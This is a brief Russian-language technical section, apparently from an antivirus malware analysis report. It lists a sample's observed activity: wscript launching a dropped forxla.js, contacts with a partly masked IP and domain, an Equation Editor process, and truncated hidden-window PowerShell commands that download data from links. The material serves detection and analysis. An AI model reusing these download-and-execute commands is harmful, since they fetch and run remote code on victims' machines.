Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\forxla.js"
- %APPDATA%\forxla.js
- '19#.#2.81.144':80
- 'up#####eimagens.com.br':443
- http://19#.#2.81.144/forXLA.js
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Lengt...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Lengt...